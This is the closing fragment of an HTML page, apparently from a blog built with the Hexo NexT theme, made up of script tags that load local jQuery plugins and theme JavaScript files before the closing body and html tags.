    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
